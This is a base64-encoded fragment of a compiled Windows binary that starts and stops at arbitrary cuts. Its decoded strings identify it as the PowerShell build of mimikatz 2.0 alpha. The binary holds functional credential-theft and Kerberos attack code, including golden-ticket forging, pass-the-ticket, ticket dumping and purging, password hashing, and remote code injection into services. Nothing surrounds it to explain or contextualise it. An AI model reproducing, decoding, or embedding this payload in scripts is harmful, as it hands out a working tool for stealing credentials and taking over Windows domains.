EAAAAAAAgAAAAAABBgAoABAAAAAAAJAAAAAADAXwKAAQAAAAAABAAAAAAAiF8CgAEAAAAAAAYAAAAAAFBfAoABAAAAAAAFAAAAAAA4XwKAAQAAAOBeAoABAAAAsF4CgAEAAABQXgKAAQAAADBeAoABAAAA4F0CgAEAAACwXQKAAQAAAFBdAoABAAAAEF0CgAEAAACwXAKAAQAAAIhcAoABAAAAMFwCgAEAAAAAXAKAAQAAAIBbAoABAAAAWFsCgAEAAADQWgKAAQAAAKBaAoABAAAAQFoCgAEAAAAYWgKAAQAAAMBZAoABAAAAiFkCgAEAAAAAWQKAAQAAANBYAoABAAAAYFgCgAEAAABAWAKAAQAAAAEAAAAAAAAAIFgCgAEAAAACAAAAAAAAAAhYAoABAAAAAwAAAAAAAADoVwKAAQAAAAQAAAAAAAAAwFcCgAEAAAAFAAAAAAAAAKhXAoABAAAABgAAAAAAAACAVwKAAQAAAAwAAAAAAAAAaFcCgAEAAAANAAAAAAAAAEBXAoABAAAADgAAAAAAAAAYVwKAAQAAAA8AAAAAAAAA8FYCgAEAAAAQAAAAAAAAAMhWAoABAAAAEQAAAAAAAACgVgKAAQAAABIAAAAAAAAAeFYCgAEAAAAUAAAAAAAAAGBWAoABAAAAFQAAAAAAAABAVgKAAQAAABYAAAAAAAAAGFYCgAEAAAAXAAAAAAAAAPhVAoABAAAAGAAAAAAAAAAFAAAABgAAAAEAAAAIAAAABwAAAAAAAAAAAAAAAAAAABBQAoABAAAACFACgAEAAADoTwKAAQAAAAhQAoABAAAA0E8CgAEAAAC4TwKAAQAAAKhPAoABAAAAkE8CgAEAAACATwKAAQAAAGhPAoABAAAASE8CgAEAAAA4TwKAAQAAACBPAoABAAAACE8CgAEAAADwTgKAAQAAANhOAoABAAAAGAAaAAAAAACoSwKAAQAAAIBhAIABAAAAYDMCgAEAAAAwMwKAAQAAAAxnAIABAAAAIDMCgAEAAAAAMwKAAQAAAOhkAIABAAAA+DICgAEAAADIMgKAAQAAAERkAIABAAAAuDICgAEAAACYMgKAAQAAAIhqAIABAAAAiDICgAEAAABgMgKAAQAAANx3AIABAAAAUDICgAEAAAAgMgKAAQAAAFR/AIABAAAAGDICgAEAAADoMQKAAQAAAGx/AIABAAAA2DECgAEAAACQMQKAAQAAAKAzAoABAAAAcDMCgAEAAABoMwKAAQAAAAgAAAAAAAAAkB8CgAEAAADsYACAAQAAADBhAIABAAAAXAAvADoAKgA/ACIAPAA+AHwAAAAAAAAARQBSAFIATwBSACAAawB1AGwAbABfAG0AXwBrAGUAcgBuAGUAbABfAGkAbwBjAHQAbABfAGgAYQBuAGQAbABlACAAOwAgAEQAZQB2AGkAYwBlAEkAbwBDAG8AbgB0AHIAbwBsACAAKAAwAHgAJQAwADgAeAApACAAOgAgADAAeAAlADAAOAB4AAoAAAAAAAAARQBSAFIATwBSACAAawB1AGwAbABfAG0AXwBrAGUAcgBuAGUAbABfAGkAbwBjAHQAbAAgADsAIABDAHIAZQBhAHQAZQBGAGkAbABlACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAAAAAABcAFwALgBcAG0AaQBtAGkAZAByAHYAAABhAAAAAAAAACIAJQBzACIAIABzAGUAcgB2AGkAYwBlACAAcABhAHQAYwBoAGUAZAAKAAAAAAAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGwAbABfAG0AXwBwAGEAdABjAGgAXwBnAGUAbgBlAHIAaQBjAFAAcgBvAGMAZQBzAHMATwByAFMAZQByAHYAaQBjAGUARgByAG8AbQBCAHUAaQBsAGQAIAA7ACAAawB1AGwAbABfAG0AXwBwAGEAdABjAGgAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBsAGwAXwBtAF8AcABhAHQAYwBoAF8AZwBlAG4AZQByAGkAYwBQAHIAbwBjAGUAcwBzAE8AcgBTAGUAcgB2AGkAYwBlAEYAcgBvAG0AQgB1AGkAbABkACAAOwAgAGsAdQBsAGwAXwBtAF8AcAByAG8AYwBlAHMAcwBfAGcAZQB0AFYAZQByAHkAQgBhAHMAaQBjAE0AbwBkAHUAbABlAEkAbgBmAG8AcgBtAGEAdABpAG8AbgBzAEYAbwByAE4AYQBtAGUAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBsAGwAXwBtAF8AcABhAHQAYwBoAF8AZwBlAG4AZQByAGkAYwBQAHIAbwBjAGUAcwBzAE8AcgBTAGUAcgB2AGkAYwBlAEYAcgBvAG0AQgB1AGkAbABkACAAOwAgAE8AcABlAG4AUAByAG8AYwBlAHMAcwAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAbABsAF8AbQBfAHAAYQB0AGMAaABfAGcAZQBuAGUAcgBpAGMAUAByAG8AYwBlAHMAcwBPAHIAUwBlAHIAdgBpAGMAZQBGAHIAbwBtAEIAdQBpAGwAZAAgADsAIABTAGUAcgB2AGkAYwBlACAAaQBzACAAbgBvAHQAIAByAHUAbgBuAGkAbgBnAAoAAAAAAAAARQBSAFIATwBSACAAawB1AGwAbABfAG0AXwBwAGEAdABjAGgAXwBnAGUAbgBlAHIAaQBjAFAAcgBvAGMAZQBzAHMATwByAFMAZQByAHYAaQBjAGUARgByAG8AbQBCAHUAaQBsAGQAIAA7ACAAawB1AGwAbABfAG0AXwBzAGUAcgB2AGkAYwBlAF8AZwBlAHQAVQBuAGkAcQB1AGUARgBvAHIATgBhAG0AZQAgACgAMAB4ACUAMAA4AHgAKQAKAAAARQBSAFIATwBSACAAawB1AGwAbABfAG0AXwBwAGEAdABjAGgAXwBnAGUAbgBlAHIAaQBjAFAAcgBvAGMAZQBzAHMATwByAFMAZQByAHYAaQBjAGUARgByAG8AbQBCAHUAaQBsAGQAIAA7ACAASQBuAGMAbwByAHIAZQBjAHQAIAB2AGUAcgBzAGkAbwBuACAAaQBuACAAcgBlAGYAZQByAGUAbgBjAGUAcwAKAAAAAABRAFcATwBSAEQAAAAAAAAAUgBFAFMATwBVAFIAQwBFAF8AUgBFAFEAVQBJAFIARQBNAEUATgBUAFMAXwBMAEkAUwBUAAAAAABGAFUATABMAF8AUgBFAFMATwBVAFIAQwBFAF8ARABFAFMAQwBSAEkAUABUAE8AUgAAAAAAAAAAAFIARQBTAE8AVQBSAEMARQBfAEwASQBTAFQAAAAAAAAATQBVAEwAVABJAF8AUwBaAAAAAAAAAAAATABJAE4ASwAAAAAAAAAAAEQAVwBPAFIARABfAEIASQBHAF8ARQBOAEQASQBBAE4AAAAAAAAAAABEAFcATwBSAEQAAAAAAAAAQgBJAE4AQQBSAFkAAAAAAEUAWABQAEEATgBEAF8AUwBaAAAAUwBaAAAAAAAAAAAATgBPAE4ARQAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBsAGwAXwBtAF8AcgBlAG0AbwB0AGUAbABpAGIAXwBjAHIAZQBhAHQAZQAgADsAIABSAHQAbABDAHIAZQBhAHQAZQBVAHMAZQByAFQAaAByAGUAYQBkACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAAAARQBSAFIATwBSACAAawB1AGwAbABfAG0AXwByAGUAbQBvAHQAZQBsAGkAYgBfAGMAcgBlAGEAdABlACAAOwAgAEMAcgBlAGEAdABlAFIAZQBtAG8AdABlAFQAaAByAGUAYQBkACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAAAAAABUAGgAIABAACAAJQBwAAoARABhACAAQAAgACUAcAAKAAAAAAAAAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAbABsAF8AbQBfAHIAZQBtAG8AdABlAGwAaQBiAF8AYwByAGUAYQB0AGUAIAA7ACAAawB1AGwAbABfAG0AXwBrAGUAcgBuAGUAbABfAGkAbwBjAHQAbABfAGgAYQBuAGQAbABlACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAbABsAF8AbQBfAHIAZQBtAG8AdABlAGwAaQBiAF8AQwByAGUAYQB0AGUAUgBlAG0AbwB0AGUAQwBvAGQAZQBXAGkAdAB0AGgAUABhAHQAdABlAHIAbgBSAGUAcABsAGEAYwBlACAAOwAgAGsAdQBsAGwAXwBtAF8AbQBlAG0AbwByAHkAXwBjAG8AcAB5ACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAbABsAF8AbQBfAHIAZQBtAG8AdABlAGwAaQBiAF8AQwByAGUAYQB0AGUAUgBlAG0AbwB0AGUAQwBvAGQAZQBXAGkAdAB0AGgAUABhAHQAdABlAHIAbgBSAGUAcABsAGEAYwBlACAAOwAgAGsAdQBsAGwAXwBtAF8AbQBlAG0AbwByAHkAXwBhAGwAbABvAGMAIAAvACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABFAHgAKQAgACgAMAB4ACUAMAA4AHgAKQAKAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBsAGwAXwBtAF8AcgBlAG0AbwB0AGUAbABpAGIAXwBDAHIAZQBhAHQAZQBSAGUAbQBvAHQAZQBDAG8AZABlAFcAaQB0AHQAaABQAGEAdAB0AGUAcgBuAFIAZQBwAGwAYQBjAGUAIAA7ACAATgBvACAAYgB1AGYAZgBlAHIAIAA/AAoAAAAAAAAAUwBlAHIAdgBpAGMAZQBzAEEAYwB0AGkAdgBlAAAAAABcAHgAJQAwADIAeAAAAAAAMAB4ACUAMAAyAHgALAAgAAAAAAAAAAAAJQAwADIAeAAgAAAAAAAAACUAMAAyAHgAAAAAAAoAAAAlAHMAIAAAACUAcwAAAAAAJQB3AFoAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBsAGwAXwBtAF8AcwB0AHIAaQBuAGcAXwBkAGkAcwBwAGwAYQB5AFMASQBEACAAOwAgAEMAbwBuAHYAZQByAHQAUwBpAGQAVABvAFMAdAByAGkAbgBnAFMAaQBkACAAKAAwAHgAJQAwADgAeAApAAoAAAAAAAAAAABUAG8AawBlAG4AAAAAAAAAAAAAAAAAAAAKACAAIAAuACMAIwAjACMAIwAuACAAIAAgAG0AaQBtAGkAawBhAHQAegAgADIALgAwACAAYQBsAHAAaABhACAAKAB4ADYANAApACAAcgBlAGwAZQBhAHMAZQAgACIASwBpAHcAaQAgAGUAbgAgAEMAIgAgACgARgBlAGIAIAAxADYAIAAyADAAMQA1ACAAMgAyADoAMQA1ADoAMgA4ACkACgAgAC4AIwAjACAAXgAgACMAIwAuACAAIAAKACAAIwAjACAALwAgAFwAIAAjACMAIAAgAC8AKgAgACoAIAAqAAoAIAAjACMAIABcACAALwAgACMAIwAgACAAIABCAGUAbgBqAGEAbQBpAG4AIABEAEUATABQAFkAIABgAGcAZQBuAHQAaQBsAGsAaQB3AGkAYAAgACgAIABiAGUAbgBqAGEAbQBpAG4AQABnAGUAbgB0AGkAbABrAGkAdwBpAC4AYwBvAG0AIAApAAoAIAAnACMAIwAgAHYAIAAjACMAJwAgACAAIABoAHQAdABwADoALwAvAGIAbABvAGcALgBnAGUAbgB0AGkAbABrAGkAdwBpAC4AYwBvAG0ALwBtAGkAbQBpAGsAYQB0AHoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAoAG8AZQAuAGUAbwApAAoAIAAgACcAIwAjACMAIwAjACcAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB3AGkAdABoACAAJQAyAHUAIABtAG8AZAB1AGwAZQBzACAAKgAgACoAIAAqAC8ACgAKAAAAAAAKAG0AaQBtAGkAawBhAHQAegAoAHAAbwB3AGUAcgBzAGgAZQBsAGwAKQAgACMAIAAlAHMACgAAAEkATgBJAFQAAAAAAAAAAABDAEwARQBBAE4AAAAAAAAAPgA+AD4AIAAlAHMAIABvAGYAIAAnACUAcwAnACAAbQBvAGQAdQBsAGUAIABmAGEAaQBsAGUAZAAgADoAIAAlADAAOAB4AAoAAAAAADoAOgAAAAAAAAAAAAAAAAAAAAAARQBSAFIATwBSACAAbQBpAG0AaQBrAGEAdAB6AF8AZABvAEwAbwBjAGEAbAAgADsAIAAiACUAcwAiACAAbQBvAGQAdQBsAGUAIABuAG8AdAAgAGYAbwB1AG4AZAAgACEACgAAAAAAAAAKACUAMQA2AHMAAAAAAAAAIAAgAC0AIAAgACUAcwAAACAAIABbACUAcwBdAAAAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAG0AaQBtAGkAawBhAHQAegBfAGQAbwBMAG8AYwBhAGwAIAA7ACAAIgAlAHMAIgAgAGMAbwBtAG0AYQBuAGQAIABvAGYAIAAiACUAcwAiACAAbQBvAGQAdQBsAGUAIABuAG8AdAAgAGYAbwB1AG4AZAAgACEACgAAAAAAAAAKAE0AbwBkAHUAbABlACAAOgAJACUAcwAAAAAAAAAAAAoARgB1AGwAbAAgAG4AYQBtAGUAIAA6AAkAJQBzAAAACgBEAGUAcwBjAHIAaQBwAHQAaQBvAG4AIAA6AAkAJQBzAAAAAAAAAEtlcmJlcm9zAAAAAAAAAAB1AHMAZQByAAAAAAAAAAAAcwBlAHIAdgBpAGMAZQAAAEwAaQBzAHQAIAB0AGkAYwBrAGUAdABzACAAaQBuACAATQBJAFQALwBIAGUAaQBtAGQAYQBsAGwAIABjAGMAYQBjAGgAZQAAAGMAbABpAHMAdAAAAAAAAABQAGEAcwBzAC0AdABoAGUALQBjAGMAYQBjAGgAZQAgAFsATgBUADYAXQAAAAAAAABwAHQAYwAAAEgAYQBzAGgAIABwAGEAcwBzAHcAbwByAGQAIAB0AG8AIABrAGUAeQBzAAAAAAAAAGgAYQBzAGgAAAAAAAAAAABXAGkAbABsAHkAIABXAG8AbgBrAGEAIABmAGEAYwB0AG8AcgB5AAAAZwBvAGwAZABlAG4AAAAAAFAAdQByAGcAZQAgAHQAaQBjAGsAZQB0ACgAcwApAAAAcAB1AHIAZwBlAAAAAAAAAFIAZQB0AHIAaQBlAHYAZQAgAGMAdQByAHIAZQBuAHQAIABUAEcAVAAAAAAAAAAAAHQAZwB0AAAATABpAHMAdAAgAHQAaQBjAGsAZQB0ACgAcwApAAAAAABsAGkAcwB0AAAAAAAAAAAAUABhAHMAcwAtAHQAaABlAC0AdABpAGMAawBlAHQAIABbAE4AVAAgADYAXQAAAAAAcAB0AHQAAAAAAAAAAAAAAEsAZQByAGIAZQByAG8AcwAgAHAAYQBjAGsAYQBnAGUAIABtAG8AZAB1AGwAZQAAAGsAZQByAGIAZQByAG8AcwAAAAAAAAAAAAAAAAAAAAAAJQAzAHUAIAAtACAARABpAHIAZQBjAHQAbwByAHkAIAAnACUAcwAnACAAKAAqAC4AawBpAHIAYgBpACkACgAAAFwAKgAuAGsAaQByAGIAaQAAAAAAXAAAACAAIAAgACUAMwB1ACAALQAgAEYAaQBsAGUAIAAnACUAcwAnACAAOgAgAAAAAAAAACUAMwB1ACAALQAgAEYAaQBsAGUAIAAnACUAcwAnACAAOgAgAAAAAABPAEsACgAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBrAGUAcgBiAGUAcgBvAHMAXwBwAHQAdABfAGYAaQBsAGUAIAA7ACAATABzAGEAQwBhAGwAbABLAGUAcgBiAGUAcgBvAHMAUABhAGMAawBhAGcAZQAgACUAMAA4AHgACgAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGsAZQByAGIAZQByAG8AcwBfAHAAdAB0AF8AZgBpAGwAZQAgADsAIABrAHUAbABsAF8AbQBfAGYAaQBsAGUAXwByAGUAYQBkAEQAYQB0AGEAIAAoADAAeAAlADAAOAB4ACkACgAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AawBlAHIAYgBlAHIAbwBzAF8AcAB0AHQAXwBkAGEAdABhACAAOwAgAEwAcwBhAEMAYQBsAGwAQQB1AHQAaABlAG4AdABpAGMAYQB0AGkAbwBuAFAAYQBjAGsAYQBnAGUAIABLAGUAcgBiAFMAdQBiAG0AaQB0AFQAaQBjAGsAZQB0AE0AZQBzAHMAYQBnAGUAIAAvACAAUABhAGMAawBhAGcAZQAgADoAIAAlADAAOAB4AAoAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGsAZQByAGIAZQByAG8AcwBfAHAAdAB0AF8AZABhAHQAYQAgADsAIABMAHMAYQBDAGEAbABsAEEAdQB0AGgAZQBuAHQAaQBjAGEAdABpAG8AbgBQAGEAYwBrAGEAZwBlACAASwBlAHIAYgBTAHUAYgBtAGkAdABUAGkAYwBrAGUAdABNAGUAcwBzAGEAZwBlACAAOgAgACUAMAA4AHgACgAAAAAAAABUAGkAYwBrAGUAdAAoAHMAKQAgAHAAdQByAGcAZQAgAGYAbwByACAAYwB1AHIAcgBlAG4AdAAgAHMAZQBzAHMAaQBvAG4AIABpAHMAIABPAEsACgAAAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGsAZQByAGIAZQByAG8AcwBfAHAAdQByAGcAZQAgADsAIABMAHMAYQBDAGEAbABsAEEAdQB0AGgAZQBuAHQAaQBjAGEAdABpAG8AbgBQAGEAYwBrAGEAZwBlACAASwBlAHIAYgBQAHUAcgBnAGUAVABpAGMAawBlAHQAQwBhAGMAaABlAE0AZQBzAHMAYQBnAGUAIAAvACAAUABhAGMAawBhAGcAZQAgADoAIAAlADAAOAB4AAoAAAAAAAAAAAAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AawBlAHIAYgBlAHIAbwBzAF8AcAB1AHIAZwBlACAAOwAgAEwAcwBhAEMAYQBsAGwAQQB1AHQAaABlAG4AdABpAGMAYQB0AGkAbwBuAFAAYQBjAGsAYQBnAGUAIABLAGUAcgBiAFAAdQByAGcAZQBUAGkAYwBrAGUAdABDAGEAYwBoAGUATQBlAHMAcwBhAGcAZQAgADoAIAAlADAAOAB4AAoAAAAAAEsAZQByAGIAZQByAG8AcwAgAFQARwBUACAAbwBmACAAYwB1AHIAcgBlAG4AdAAgAHMAZQBzAHMAaQBvAG4AIAA6ACAAAAAAAAAAAAAAAAAACgAKAAkAKgAqACAAUwBlAHMAcwBpAG8AbgAgAGsAZQB5ACAAaQBzACAATgBVAEwATAAhACAASQB0ACAAbQBlAGEAbgBzACAAYQBsAGwAbwB3AHQAZwB0AHMAZQBzAHMAaQBvAG4AawBlAHkAIABpAHMAIABuAG8AdAAgAHMAZQB0ACAAdABvACAAMQAgACoAKgAKAAAAAABuAG8AIAB0AGkAYwBrAGUAdAAgACEACgAAAAAAAAAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBrAGUAcgBiAGUAcgBvAHMAXwB0AGcAdAAgADsAIABMAHMAYQBDAGEAbABsAEEAdQB0AGgAZQBuAHQAaQBjAGEAdABpAG8AbgBQAGEAYwBrAGEAZwBlACAASwBlAHIAYgBSAGUAdAByAGkAZQB2AGUAVABpAGMAawBlAHQATQBlAHMAcwBhAGcAZQAgAC8AIABQAGEAYwBrAGEAZwBlACAAOgAgACUAMAA4AHgACgAAAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AawBlAHIAYgBlAHIAbwBzAF8AdABnAHQAIAA7ACAATABzAGEAQwBhAGwAbABBAHUAdABoAGUAbgB0AGkAYwBhAHQAaQBvAG4AUABhAGMAawBhAGcAZQAgAEsAZQByAGIAUgBlAHQAcgBpAGUAdgBlAFQAaQBjAGsAZQB0AE0AZQBzAHMAYQBnAGUAIAA6ACAAJQAwADgAeAAKAAAAAABlAHgAcABvAHIAdAAAAAAACgBbACUAMAA4AHgAXQAgAC0AIAAwAHgAJQAwADgAeAAgAC0AIAAlAHMAAAAAAAAACgAgACAAIABTAHQAYQByAHQALwBFAG4AZAAvAE0AYQB4AFIAZQBuAGUAdwA6ACAAAAAAAAAAAAAgADsAIAAAAAAAAAAAAAAACgAgACAAIABTAGUAcgB2AGUAcgAgAE4AYQBtAGUAIAAgACAAIAAgACAAIAA6ACAAJQB3AFoAIABAACAAJQB3AFoAAAAAAAAAAAAAAAAAAAAKACAAIAAgAEMAbABpAGUAbgB0ACAATgBhAG0AZQAgACAAIAAgACAAIAAgADoAIAAlAHcAWgAgAEAAIAAlAHcAWgAAAAAAAAAKACAAIAAgAEYAbABhAGcAcwAgACUAMAA4AHgAIAAgACAAIAA6ACAAAAAAAAAAAABrAGkAcgBiAGkAAAAAAAAACgAgACAAIAAqACAAUwBhAHYAZQBkACAAdABvACAAZgBpAGwAZQAgACAAIAAgACAAOgAgACUAcwAAAAAAAAAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBrAGUAcgBiAGUAcgBvAHMAXwBsAGkAcwB0ACAAOwAgAEwAcwBhAEMAYQBsAGwAQQB1AHQAaABlAG4AdABpAGMAYQB0AGkAbwBuAFAAYQBjAGsAYQBnAGUAIABLAGUAcgBiAFIAZQB0AHIAaQBlAHYAZQBFAG4AYwBvAGQAZQBkAFQAaQBjAGsAZQB0AE0AZQBzAHMAYQBnAGUAIAAvACAAUABhAGMAawBhAGcAZQAgADoAIAAlADAAOAB4AAoAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGsAZQByAGIAZQByAG8AcwBfAGwAaQBzAHQAIAA7ACAATABzAGEAQwBhAGwAbABBAHUAdABoAGUAbgB0AGkAYwBhAHQAaQBvAG4AUABhAGMAawBhAGcAZQAgAEsAZQByAGIAUgBlAHQAcgBpAGUAdgBlAEUAbgBjAG8AZABlAGQAVABpAGMAawBlAHQATQBlAHMAcwBhAGcAZQAgADoAIAAlADAAOAB4AAoAAAAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBrAGUAcgBiAGUAcgBvAHMAXwBsAGkAcwB0ACAAOwAgAEwAcwBhAEMAYQBsAGwAQQB1AHQAaABlAG4AdABpAGMAYQB0AGkAbwBuAFAAYQBjAGsAYQBnAGUAIABLAGUAcgBiAFEAdQBlAHIAeQBUAGkAYwBrAGUAdABDAGEAYwBoAGUARQB4ADIATQBlAHMAcwBhAGcAZQAgAC8AIABQAGEAYwBrAGEAZwBlACAAOgAgACUAMAA4AHgACgAAAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGsAZQByAGIAZQByAG8AcwBfAGwAaQBzAHQAIAA7ACAATABzAGEAQwBhAGwAbABBAHUAdABoAGUAbgB0AGkAYwBhAHQAaQBvAG4AUABhAGMAawBhAGcAZQAgAEsAZQByAGIAUQB1AGUAcgB5AFQAaQBjAGsAZQB0AEMAYQBjAGgAZQBFAHgAMgBNAGUAcwBzAGEAZwBlACAAOgAgACUAMAA4AHgACgAAAAAAAAAAACUAdQAtACUAMAA4AHgALQAlAHcAWgBAACUAdwBaAC0AJQB3AFoALgAlAHMAAAAAAHQAaQBjAGsAZQB0AC4AawBpAHIAYgBpAAAAAAAAAAAAdABpAGMAawBlAHQAAAAAAGEAZABtAGkAbgAAAAAAAABkAG8AbQBhAGkAbgAAAAAAcwBpAGQAAABkAGUAcwAAAHIAYwA0AAAAawByAGIAdABnAHQAAAAAAGEAZQBzADEAMgA4AAAAAABhAGUAcwAyADUANgAAAAAAdABhAHIAZwBlAHQAAAAAAGkAZAAAAAAAZwByAG8AdQBwAHMAAAAAADAAAAAAAAAAcwB0AGEAcgB0AG8AZgBmAHMAZQB0AAAANQAyADUANgAwADAAMAAAAGUAbgBkAGkAbgAAAAAAAAByAGUAbgBlAHcAbQBhAHgAAAAAAAAAAABVAHMAZQByACAAIAAgACAAIAAgADoAIAAlAHMACgBEAG8AbQBhAGkAbgAgACAAIAAgADoAIAAlAHMACgBTAEkARAAgACAAIAAgACAAIAAgADoAIAAlAHMACgBVAHMAZQByACAASQBkACAAIAAgADoAIAAlAHUACgAAAAAAAAAAAEcAcgBvAHUAcABzACAASQBkACAAOgAgACoAAAAAAAAAJQB1ACAAAAAKAFMAZQByAHYAaQBjAGUASwBlAHkAOgAgAAAAAAAAACAALQAgACUAcwAKAAAAAABTAGUAcgB2AGkAYwBlACAAIAAgADoAIAAlAHMACgAAAFQAYQByAGcAZQB0ACAAIAAgACAAOgAgACUAcwAKAAAATABpAGYAZQB0AGkAbQBlACAAIAA6ACAAAAAAAAAAAAAqACoAIABQAGEAcwBzACAAVABoAGUAIABUAGkAYwBrAGUAdAAgACoAKgAAAAAAAAAtAD4AIABUAGkAYwBrAGUAdAAgADoAIAAlAHMACgAKAAAAAAAAAAAACgBHAG8AbABkAGUAbgAgAHQAaQBjAGsAZQB0ACAAZgBvAHIAIAAnACUAcwAgAEAAIAAlAHMAJwAgAHMAdQBjAGMAZQBzAHMAZgB1AGwAbAB5ACAAcwB1AGIAbQBpAHQAdABlAGQAIABmAG8AcgAgAGMAdQByAHIAZQBuAHQAIABzAGUAcwBzAGkAbwBuAAoAAAAAAAAAAAAKAEYAaQBuAGEAbAAgAFQAaQBjAGsAZQB0ACAAUwBhAHYAZQBkACAAdABvACAAZgBpAGwAZQAgACEACgAAAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGsAZQByAGIAZQByAG8AcwBfAGcAbwBsAGQAZQBuACAAOwAgAAoAawB1AGwAbABfAG0AXwBmAGkAbABlAF8AdwByAGkAdABlAEQAYQB0AGEAIAAoADAAeAAlADAAOAB4ACkACgAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AawBlAHIAYgBlAHIAbwBzAF8AZwBvAGwAZABlAG4AIAA7ACAASwByAGIAQwByAGUAZAAgAGUAcgByAG8AcgAKAAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AawBlAHIAYgBlAHIAbwBzAF8AZwBvAGwAZABlAG4AIAA7ACAASwByAGIAdABnAHQAIABrAGUAeQAgAHMAaQB6AGUAIABsAGUAbgBnAHQAaAAgAG0AdQBzAHQAIABiAGUAIAAlAHUAIAAoACUAdQAgAGIAeQB0AGUAcwApACAAZgBvAHIAIAAlAHMACgAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBrAGUAcgBiAGUAcgBvAHMAXwBnAG8AbABkAGUAbgAgADsAIABVAG4AYQBiAGwAZQAgAHQAbwAgAGwAbwBjAGEAdABlACAAQwByAHkAcAB0AG8AUwB5AHMAdABlAG0AIABmAG8AcgAgAEUAVABZAFAARQAgACUAdQAgACgAZQByAHIAbwByACAAMAB4ACUAMAA4AHgAKQAgAC0AIABBAEUAUwAgAG8AbgBsAHkAIABhAHYAYQBpAGwAYQBiAGwAZQAgAG8AbgAgAE4AVAA2AAoAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBrAGUAcgBiAGUAcgBvAHMAXwBnAG8AbABkAGUAbgAgADsAIABNAGkAcwBzAGkAbgBnACAAawByAGIAdABnAHQAIABrAGUAeQAgAGEAcgBnAHUAbQBlAG4AdAAgACgALwByAGMANAAgAG8AcgAgAC8AYQBlAHMAMQAyADgAIABvAHIAIAAvAGEAZQBzADIANQA2ACkACgAAAAAAAAAAAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBrAGUAcgBiAGUAcgBvAHMAXwBnAG8AbABkAGUAbgAgADsAIABTAEkARAAgAHMAZQBlAG0AcwAgAGkAbgB2AGEAbABpAGQAIAAtACAAQwBvAG4AdgBlAHIAdABTAHQAcgBpAG4AZwBTAGkAZABUAG8AUwBpAGQAIAAoADAAeAAlADAAOAB4ACkACgAAAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGsAZQByAGIAZQByAG8AcwBfAGcAbwBsAGQAZQBuACAAOwAgAE0AaQBzAHMAaQBuAGcAIABTAEkARAAgAGEAcgBnAHUAbQBlAG4AdAAKAAAAAAAAAAAARQBSAFIATwBSACAAawB1AGgAbABfAG0AXwBrAGUAcgBiAGUAcgBvAHMAXwBnAG8AbABkAGUAbgAgADsAIABNAGkAcwBzAGkAbgBnACAAZABvAG0AYQBpAG4AIABhAHIAZwB1AG0AZQBuAHQACgAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AawBlAHIAYgBlAHIAbwBzAF8AZwBvAGwAZABlAG4AIAA7ACAATQBpAHMAcwBpAG4AZwAgAHUAcwBlAHIAIABhAHIAZwB1AG0AZQBuAHQACgAAAAAAAAAgACoAIABQAEEAQwAgAGcAZQBuAGUAcgBhAHQAZQBkAAoAAAAAAAAAIAAqACAAUABBAEMAIABzAGkAZwBuAGUAZAAKAAAAAAAgACoAIABFAG4AYwBUAGkAYwBrAGUAdABQAGEAcgB0ACAAZwBlAG4AZQByAGEAdABlAGQACgAAACAAKgAgAEUAbgBjAFQAaQBjAGsAZQB0AFAAYQByAHQAIABlAG4AYwByAHkAcAB0AGUAZAAKAAAAIAAqACAASwByAGIAQwByAGUAZAAgAGcAZQBuAGUAcgBhAHQAZQBkAAoAAAAAAAAAAAAAAAAAAABFAFIAUgBPAFIAIABrAHUAaABsAF8AbQBfAGsAZQByAGIAZQByAG8AcwBfAGcAbwBsAGQAZQBuAF8AZABhAHQAYQAgADsAIABrAHUAaABsAF8AbQBfAGsAZQByAGIAZQByAG8AcwBfAGUAbgBjAHIAeQBwAHQAIAAlADAAOAB4AAoAAAAAAAAAcABhAHMAcwB3AG8AcgBkAAAAAAAAAAAAYwBvAHUAbgB0AAAAAAAAAEUAUgBSAE8AUgAgAGsAdQBoAGwAXwBtAF8AawBlAHIAYgBlAHIAbwBzAF8AaABhAHMAaAAgADsAIABIAGEAcwBoAFAAYQBz